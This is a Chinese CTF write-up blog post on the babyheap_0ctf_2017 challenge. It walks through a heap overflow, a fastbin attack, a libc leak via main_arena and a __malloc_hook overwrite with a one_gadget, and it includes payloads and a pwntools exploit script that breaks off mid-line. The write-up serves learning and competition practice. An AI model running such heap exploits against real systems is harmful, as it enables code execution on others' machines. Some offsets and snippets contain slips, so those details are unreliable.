<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="0110 0011 0111 1001 0110 0010" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="0110 0011 0111 1001 0110 0010" type="application/atom+xml"><link rel="alternate" type="application/json" title="0110 0011 0111 1001 0110 0010" href="https://vvwwvv.cn/feed.json"/><link rel="preconnect" href="https://lf9-cdn-tos.bytecdntp.com"/><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"/><link rel="dns-prefetch" href="https://unpkg.com"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext"><link rel="stylesheet" href="/css/app.css?v=0.3.5"><script src="https://cdn.staticfile.org/vue/3.2.45/vue.global.prod.js"></script><link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css"/><meta name="keywords" content="pwn,"/><link rel="canonical" href="https://vvwwvv.cn/2023/09/12/pwn/%E5%88%B7%E9%A2%98/BUUCTF/babyheap_0ctf_2017/"><title>babyheap_0ctf_2017，fastbin.attack之double.free</title><meta name="generator" content="Hexo 6.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">babyheap_0ctf_2017，fastbin.attack之double.free</h1><div class="meta"><span class="item" title="创建时间：2023-09-12 21:08:15"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2023-09-12T21:08:15+08:00">2023-09-12</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>9.7k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>9 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">vvwwv'Blog</a></li></ul><ul class="right" id="rightNav"><li class="item theme" @click="changeThemeByBtn"><i class="ic" :class="{'i-sun': !themeStatus,'i-moon': themeStatus}"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><img src="https://ooo.0x0.ooo/2023/03/09/Y0xvg.jpg"></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/CTF/" itemprop="item" rel="index" title="分类于CTF"><span itemprop="name">CTF<meta itemprop="position" content="0"/></span></a></span><i class="ic i-angle-right"></i><span itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/CTF/BUUCTF/" itemprop="item" rel="index" title="分类于BUUCTF"><span itemprop="name">BUUCTF<meta itemprop="position" content="1"/></span></a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/CTF/BUUCTF/%E5%A0%86/" itemprop="item" rel="index" title="分类于堆"><span itemprop="name">堆<meta itemprop="position" content="2"/></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://vvwwvv.cn/2023/09/12/pwn/%E5%88%B7%E9%A2%98/BUUCTF/babyheap_0ctf_2017/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"/><meta itemprop="name" content="vvwwv"/><meta itemprop="description" content=", "/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="0110 0011 0111 1001 0110 0010"/></span><div class="body md" itemprop="articleBody"><p>由于断断续续写了好久加上自身水平不足导致可能存在逻辑上的错误等等，如有错误，还望指出</p>
<p><s>先前的理解<br />
改变 index4 的大小后被认为是释放了，然后分配 fastbin (小于 0x80 的在这里) 根据后进先出，分配被认为是释放的 index4 为 index2，在将 index 的大小改回去，此时便让两个 index2 和 index4 都指向了同一个 chunk</s></p>
<p><s>通过堆溢出，用还未释放的 index0 来溢出改变 chunk2 的 fd 的地址为 chunk4<br />
，原来应该通过释放由于后进先出通过 free1，free2 的顺序，fastbin 中是由 chunk2-&gt;chunk1, 溢出后变为 chunk2-&gt;chunk4，此时视为 chunk4 被释放放在 fastbin 中，因为需要让两个 index 指向同一个 chunk，就需要在重新申请堆块 chunk1 和 chunkl2 后再申请 chunk4，由于再 fastbin 中，是后进先出（在 fastbin 中：chunk2-&gt;chunk4）所以给 index1 分配的是原来的 chunk2，而 index2 就被分配了 chunk4，</s></p>
<p><s>后面 mallco (0x80) 仍然分配的是 chunk4（我认为应该是原本就是指向 chunk4，且已经修改了大小，所以申请时能够通过 “chunksuize 与其对应的 fastbin_index 匹配” 这是一个节省资源的机制，给相同大小的直接分配，不用去再合并块等等），这时 index2 与 index4 都指向了 chuink4，再次释放 free4，chunk4 就进入 unsortbin（unsortedbin 中只有一个块时，就会使 fd 和 bk 指针指向同一个地址，即  <code>main_arena+88, main_arena相对libc固定偏移0x3c4b20,不同libc版本偏移不同</code> ，因此  <code>libc=main_area_88-88-0x3c4b20</code> ）</s></p>
<p>最终利用：<br />
<strong>malloc_hook 是一个 libc 上的函数，如果指针不为空则会执行其指针指向的函数，通过这个来 getshell</strong></p>
<h1 id="1查看程序"><a class="anchor" href="#1查看程序">#</a> 1. 查看程序</h1>
<p><img data-src="https://s1.ax1x.com/2023/09/12/pP2uqmV.png" alt="" /></p>
<p>发现保护全开了，利用 ida 查看一下</p>
<p><img data-src="https://s1.ax1x.com/2023/09/12/pP2uvY4.png" alt="" /></p>
<p>挨个查看</p>
<p><img data-src="https://s1.ax1x.com/2023/09/12/pP2K961.png" alt="" /></p>
<p>switch 里的判断条件（用来选择）：</p>
<p><img data-src="https://s1.ax1x.com/2023/09/12/pP2KKXt.png" alt="" /></p>
<p>case 1（allocate，分配 chunk）：</p>
<p><img data-src="https://s1.ax1x.com/2023/09/12/pP2KUcn.png" alt="" /></p>
<p>case 2（fill，进行内容填充，存在堆溢出）：</p>
<p><img data-src="https://s1.ax1x.com/2023/09/12/pP2MED0.png" alt="" /></p>
<p>case 3（free，释放 chunk）：</p>
<p><img data-src="https://s1.ax1x.com/2023/09/12/pP2MM8J.png" alt="" /></p>
<p>case 4（dump，输出内容，可以以此获取 main.arena88）：</p>
<p><img data-src="https://s1.ax1x.com/2023/09/12/pP2MN5D.png" alt="" /></p>
<h1 id="2漏洞分析"><a class="anchor" href="#2漏洞分析">#</a> 2. 漏洞分析</h1>
<p>1. 由于 unsorted bin 中只有一个块时会将 fb 和 bk 指针指向 main.arena+88 处，而 libc 距 main.aerna-offset（该 offset 是一个固定值，只是不同版本的 libc 里不同）</p>
<p><code>libc_base=main_arena_88-offset-88</code></p>
<p>2. 因此我们要使一块 chunk 去到 unsorted bin 再用 dump 泄露出来，这就需要我们让两个 index 来指向同一个 chunk，一个释放掉使 chunk 到 unsorted bin，另一个就可以通过 dump 来泄露 main.arena+88 的地址</p>
<ol start="3">
<li></li>
</ol>
<p>要让两个 index 指向同一个 chunk，就需要借助 free 来实现，通过 <strong>free 两个 index (chunk1,chunk2)</strong> ，使其到 fastbin 中，其会按照后进先出原则，再通过溢出<strong>使一个 index2 的 fd 指向 chunk4</strong>，将原来的 fastbin 中<strong> chunk2-&gt;chunk1 变换为了 chunk2-&gt;chunk4</strong>，此时 mallco （index1 的大小）时会将 chunk2 分配给 index1，而 mallco （index2 的大小）会将 chunk4 分配给 index2【注意此时要修改 chunk4 的 size 和 index2 的大小一致】，然后通过溢出 index3 将 chunk4 的 size 值恢复，然后再 mallco （index4 的大小）再释放，这时 chunk4 就会进入 unsorted bin , 并且 index2 也指向了 chunk4，可以通过 dump（index2）来泄露 main.arena+88 的地址</p>
<p>4.fastbin attack</p>
<p>原理：</p>
<p>通过 double free 利用 ：释放 chunk1 和 chunk2 然后 fastbin 里就会形成   <code>fd指向的是下一个chunk的pre_size位</code></p>
<p><img data-src="https://z1.ax1x.com/2023/09/13/pP22dJO.png" alt="" /></p>
<p>利用 double free 来再次释放 chunk1，会变成：</p>
<p><img data-src="https://z1.ax1x.com/2023/09/13/pP2fPJK.png" alt="" /></p>
<p>此时申请后分配 chunk1：</p>
<p><img data-src="https://z1.ax1x.com/2023/09/13/pP2fNoq.png" alt="" /></p>
<p>接着需要写入前面分配的 chunk1 来改变 fd 指向到想要写入的地址（此处是因为 free 了两次所以同一个 chunk1 一个再 heap 中，另一个在 fastbin 里，通过 heap 写入就能改写 fastbin 里的 fd 指向）</p>
<p><img data-src="https://z1.ax1x.com/2023/09/13/pP2IUuF.png" alt="" /></p>
<p>接着 mallco chunk2 和 mallco chunk1，此时 fastbin 指向新指向的 chunk3</p>
<p><img data-src="https://z1.ax1x.com/2023/09/13/pP2IqKS.png" alt="" /></p>
<p>此时再 mallco 一次即可申请到新的 chunk3，然后就可以进行改写内容</p>
<p>回到题目：</p>
<p>通过泄露的地址来获得 libc 的基地址， <strong>libc 上的函数 libc_mallco，该函数会调用 mallco hook，是 libc 上的一个函数指针，若该指针不为空则执行它指向的函数</strong> ，我们可以以此来 getshell，用 fastbin attack 将一个 libc 上的地址放入 fastbin 链表中，然后通过 malloc （），将该地址分配，这样就可以改写 libc 的内容，通过 mallco hook 来 getshell（写入地址后再次 mallco 即可执行 mallco hook）</p>
<p><span class="exturl" data-url="aHR0cDovL3QuY3Nkbi5jbi9JelVrVg==">http://t.csdn.cn/IzUkV</span></p>
<p>此时 chunk4 在 unsorted bin 中，我们需要 mallco 0x60，再 free 使其放入到 fastbin 中，因为前面 index2 已经指向了 chunk4，所以通过 index2 写入要修改的地址即可，然后 mallco 2 次，一个是 chunk4，一个就是新的 chunk 为要修改的 mallco hook</p>
<h1 id="3漏洞利用"><a class="anchor" href="#3漏洞利用">#</a> 3. 漏洞利用</h1>
<p>1. 先利用 allocate 得到 chunk</p>
<pre><code>allocate(0x10)  index0
allocate(0x10)  index1
allocate(0x10)  index2
allocate(0x10)  index3
allocate(0x80)  index4
</code></pre>
<p>2. 利用 free，使后续的两个 index 可以指向同一个 chunk</p>
<pre><code>free（1）
free（2）
</code></pre>
<p>【注意修改 glibc 版本】</p>
<pre><code>patchelf --set-interpreter ~/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so --set-rpath ~/Tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ ~/Downloads/buuctf/babyheap_0ctf_2017
</code></pre>
<p>查看此时的堆（glibc 2.26 版本以后会不一样），可以发现地址都是对齐的：</p>
<p><img data-src="https://z1.ax1x.com/2023/09/13/pPRAMSP.png" alt="" /></p>
<p>查看 bins，此时是 chunk2-&gt;chunk1：</p>
<p><img data-src="https://z1.ax1x.com/2023/09/13/pPRAtFs.png" alt="" /></p>
<p>查看该 heap 的内容，由下面的图也可以发现地址只有第一个字节不同，所以后面溢出修改一个字节为 0x80 就好：</p>
<p><img data-src="https://z1.ax1x.com/2023/09/13/pPRAck9.png" alt="" /></p>
<h2 id="溢出"><a class="anchor" href="#溢出">#</a> 溢出</h2>
<p>利用 index0 来溢出改写 index2 的 fd（不用 index1 是因为 index1 也被释放），利用 index3 来改写 index4 的 size</p>
<figure class="highlight python"><figcaption data-lang="python"><span>n</span></figcaption><table><tr><td data-num="1"></td><td><pre>payload1<span class="token operator">=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">//</span>填充index0的fd和bk（因为此处是作为存储数据来用，并不是存地址）</pre></td></tr><tr><td data-num="2"></td><td><pre>payload1<span class="token operator">+=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x21</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">//</span>index1的pre_size和size位和fd、bk</pre></td></tr><tr><td data-num="3"></td><td><pre>payload1<span class="token operator">+=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x21</span><span class="token punctuation">)</span><span class="token operator">+</span>p<span class="token punctuation">(</span><span class="token number">0x80</span><span class="token punctuation">)</span><span class="token operator">//</span>index2：pre_size、size、fd</pre></td></tr><tr><td data-num="4"></td><td><pre>fill<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span>length<span class="token punctuation">(</span>payload1<span class="token punctuation">)</span><span class="token punctuation">,</span>payload1<span class="token punctuation">)</span>  <span class="token operator">//</span>填充 index0进行溢出</pre></td></tr><tr><td data-num="5"></td><td><pre></pre></td></tr><tr><td data-num="6"></td><td><pre></pre></td></tr><tr><td data-num="7"></td><td><pre>payload2<span class="token operator">=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>  <span class="token operator">//</span>填充index3</pre></td></tr><tr><td data-num="8"></td><td><pre>payload2<span class="token operator">+=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x21</span><span class="token punctuation">)</span> <span class="token operator">//</span>溢出修改index4的size位</pre></td></tr><tr><td data-num="9"></td><td><pre>fill<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span>length<span class="token punctuation">(</span>payload2<span class="token punctuation">)</span><span class="token punctuation">,</span>payload2<span class="token punctuation">)</span></pre></td></tr></table></figure><p>index2 的 fd 位 0x80 是因为堆始终是 <strong>4KB 对齐</strong> 的，所以 index4 的第一个字节 (小端序) 必定是 80（前面的 index0~3 都占了 0x20）</p>
<p>【这里解释修改 index4 的 size 位，这里 index4 对应 chunk4】</p>
<pre><code>查看其 chunksize 与相应的 fastbin_index 是否匹配，
实际上 chunksize 的计算方法是 victim-&gt;size &amp; ~(SIZE_BITS))，
而它对应的 index 计算方法为 (size) &gt;&gt; (SIZE_SZ == 8 ? 4 : 3) - 2，
这里 64位的平台对应的 SIZE_SZ 是8，则 fastbin_index 为 (size &gt;&gt; 4) - 2，
那么我们将 small chunk 的 size 域改写成 0x21 即可。
</code></pre>
<p>3. 构造两个 index 指向同一个 chunk（index2，index4 都指向 chunk4）</p>
<p>由于前面的溢出 index2 导致对应的 chunk2 的 fd 指向了 chunk4（此时 chunk2 在 fastbin 表里，所以使 chunk4 也在 fastbin 表中），此时 fastbin-&gt;chunk2-&gt;chunk4</p>
<pre><code>allocate(0x10)  //index1，此时会将chunk2分配给index1
allocate(0x10)  //index2，此时会将chunk4分配给index2
</code></pre>
<p>此时就有两个 index 指向同一个 chunk 了，接着改回来原来的 index4 的大小</p>
<pre><code>payload3=p64(0)+p64(0)
payload3+=p64(0)+p64(0x91)
fill(3,length(payload3),payload3)
</code></pre>
<p>接着给 index4 分配 chunk4（因为前面 index2 回收 chunk4 没有改变 index4 指向的 chunk 地址，所以给 index 分配的仍然是 chunk4）</p>
<pre><code>allocate(0x80) //给index4分配chunk4
free(4)  //释放chunk4，因为大于等于0x80，所以进入unsorted bin中
</code></pre>
<p>此时 chunk4 的 fd 和 bk 就指向 <code>main_arena+88</code>  处</p>
<p>4. 泄露 <code>main_arena_88</code>  地址，计算得到 libc_base（ <strong>main_arena 相对 libc 固定偏移 0x3c4b20, 不同 libc 版本偏移不同</strong> ）</p>
<pre><code>dump(2)
main_arena_88=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')
libc_base=main_arena_88-0x3c4b78   (0x3c4b0+88,一般2.23_64的偏移都是这个，不同libc版本会有不同
</code></pre>
<p>5. 构造 <code>fake_chunk</code> ，使其能够溢出到 <code>malloc_hook</code></p>
<p>计算 fake_chunk 的地址（ <code>malloc_hook</code>  就在 <code>main_arena</code>  的上面，我们需要找一个 <code>malloc_hook</code>  附近能够构造 chunk 的地址作为 <code>fake_chunk</code> ）：</p>
<p><img data-src="https://z1.ax1x.com/2023/09/14/pPRXwTK.png" alt="" /></p>
<p>在 <code>main_arena-0x40+0xd</code>  的地方找到该地址，由于有保护，所以要用 <code>libc_base+偏移</code> 来到达该地址</p>
<pre><code>fake_chunk=main_arena-0x40+0xd (mian_arena-0x33)
libc_base=main_arena+0x58-0x3c4b78
(main_arena-0x3c4b78=libc_base-0x58)	

fake_chunk=libc_base-0x58+0x3c4b78-0x40+0xd= libc_base+3c4aed 
</code></pre>
<p>所以 <code>fake_chunk= libc_base+0x3c4aed</code></p>
<p>6. 将 fake_chunk 地址写入 fastbin 中，便于后续溢出来 getshell</p>
<p>由于此时 chunk4 仍然在 unsorted bin 中（index4 被释放），而 index2 仍然指向 chunk4，可以用 index2 来改写 fd，所以要使 chunk4 进入 fastbin 中</p>
<pre><code>allocate(0x60) //回收一部分chunk4
free(4)  //使chunk4进入fastbin中

payload4=p64(fake_chunk)  //改写chunk4的fd使fake_chunk进入fastbin
fill(2,length(payload4),payload4)
</code></pre>
<p>7. 回收 chunk4 与 fake_chunk 来 getshell (  <code>malloc_hook=main_arena-0x10</code>  )</p>
<pre><code>allocate(0x60)  //index4，分配chunk4
allocate(0x60)  //index5，分配fake_chunk

//因为 malloc_hook=main_arena-0x10，fake_chunk=mian_arena-0x33
//所以 malloc_hook=fake_chunk+0x23(fake_chunk+0x33-0x10)

payload5=p64(0)+p64(0)+p8(0)*3 //0x13
payload5+=p64(libc_base+0x4526a) //0x4526a由one_gadget查找得到
fill(5，length(payload5),payload5)

allocate(0x60) //执行一次就会执行malloc_hook，就可以getshell
</code></pre>
<p>通过别人的 wp 发现 one_gadget 找出来的地址不对的原因：<br />
<strong>值得注意的是，<br />
这道题在于 2017 年的 0ctf 上的赛题，在当时使用 libc2.23-0ubuntu11.2 版本的共享库，但时至今日，Ubuntu16 已经不再使用该版本，而是 libc2.23-0ubuntu11.3 版本共享库，而 buu 上也使用前者版本，只能通过一些以前的 wp 来获取当时版本的 one_gadget，这里记一下比较常用的</strong></p>
<pre><code>og1=[0x45216,0x4526a,0xf02a4,0xf1147]    #libc2.23-0ubuntu11.2
og2=[0x45226,0x4527a,0xf0364,0xf1207]    #libc2.23-0ubuntu11.3
</code></pre>
<p><span class="exturl" data-url="aHR0cHM6Ly90b2thbWVpbmUudG9wLzIwMjEvMDgvMDkvYmFieWhlYXBfMGN0Zl8yMDE3Lw==">https://tokameine.top/2021/08/09/babyheap_0ctf_2017/</span><br />
exp:</p>
<figure class="highlight python"><figcaption data-lang="python"><span>n</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token keyword">from</span> LibcSearcher <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="3"></td><td><pre>context<span class="token punctuation">.</span>log_level <span class="token operator">=</span> <span class="token string">'debug'</span></pre></td></tr><tr><td data-num="4"></td><td><pre>p<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'node4.buuoj.cn'</span><span class="token punctuation">,</span><span class="token number">25727</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token comment">#e=ELF("./babyheap_0ctf_2017")</span></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token comment">#write_plt=e.plt["write"]</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token comment">#read_plt=e.plt["read"]</span></pre></td></tr><tr><td data-num="8"></td><td><pre></pre></td></tr><tr><td data-num="9"></td><td><pre></pre></td></tr><tr><td data-num="10"></td><td><pre><span class="token keyword">def</span> <span class="token function">allocate</span><span class="token punctuation">(</span>size<span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="11"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Command: "</span><span class="token punctuation">,</span><span class="token string">"1"</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="12"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Size: "</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span>size<span class="token punctuation">)</span><span class="token punctuation">)</span>  <span class="token comment">#此处必须转成 str（）类型，下面同理</span></pre></td></tr><tr><td data-num="13"></td><td><pre></pre></td></tr><tr><td data-num="14"></td><td><pre><span class="token keyword">def</span> <span class="token function">fill</span><span class="token punctuation">(</span>index<span class="token punctuation">,</span>size<span class="token punctuation">,</span>content<span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="15"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Command: "</span><span class="token punctuation">,</span><span class="token string">"2"</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="16"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Index: "</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="17"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Size: "</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span>size<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="18"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Content: "</span><span class="token punctuation">,</span>content<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="19"></td><td><pre>    </pre></td></tr><tr><td data-num="20"></td><td><pre><span class="token keyword">def</span> <span class="token function">free</span><span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="21"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Command: "</span><span class="token punctuation">,</span><span class="token string">"3"</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="22"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Index: "</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="23"></td><td><pre></pre></td></tr><tr><td data-num="24"></td><td><pre><span class="token keyword">def</span> <span class="token function">dump</span><span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="25"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Command: "</span><span class="token punctuation">,</span><span class="token string">"4"</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="26"></td><td><pre>    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">"Index: "</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="27"></td><td><pre></pre></td></tr><tr><td data-num="28"></td><td><pre><span class="token comment">#步骤 1（对应上面的讲解步骤）</span></pre></td></tr><tr><td data-num="29"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">)</span> </pre></td></tr><tr><td data-num="30"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="31"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="32"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="33"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x80</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="34"></td><td><pre></pre></td></tr><tr><td data-num="35"></td><td><pre><span class="token comment">#步骤 2</span></pre></td></tr><tr><td data-num="36"></td><td><pre>free<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="37"></td><td><pre>free<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="38"></td><td><pre></pre></td></tr><tr><td data-num="39"></td><td><pre>payload1<span class="token operator">=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">*</span><span class="token number">2</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x21</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">*</span><span class="token number">3</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x21</span><span class="token punctuation">)</span><span class="token operator">+</span>p8<span class="token punctuation">(</span><span class="token number">0x80</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="40"></td><td><pre>fill<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token builtin">len</span><span class="token punctuation">(</span>payload1<span class="token punctuation">)</span><span class="token punctuation">,</span>payload1<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="41"></td><td><pre></pre></td></tr><tr><td data-num="42"></td><td><pre>payload2<span class="token operator">=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">*</span><span class="token number">3</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x21</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="43"></td><td><pre>fill<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token builtin">len</span><span class="token punctuation">(</span>payload2<span class="token punctuation">)</span><span class="token punctuation">,</span>payload2<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="44"></td><td><pre></pre></td></tr><tr><td data-num="45"></td><td><pre><span class="token comment">#步骤 3</span></pre></td></tr><tr><td data-num="46"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="47"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="48"></td><td><pre></pre></td></tr><tr><td data-num="49"></td><td><pre>payload3<span class="token operator">=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">*</span><span class="token number">3</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x91</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="50"></td><td><pre>fill<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token builtin">len</span><span class="token punctuation">(</span>payload3<span class="token punctuation">)</span><span class="token punctuation">,</span>payload3<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="51"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x80</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="52"></td><td><pre>free<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="53"></td><td><pre></pre></td></tr><tr><td data-num="54"></td><td><pre><span class="token comment">#步骤 4</span></pre></td></tr><tr><td data-num="55"></td><td><pre>dump<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="56"></td><td><pre>main_arena_88<span 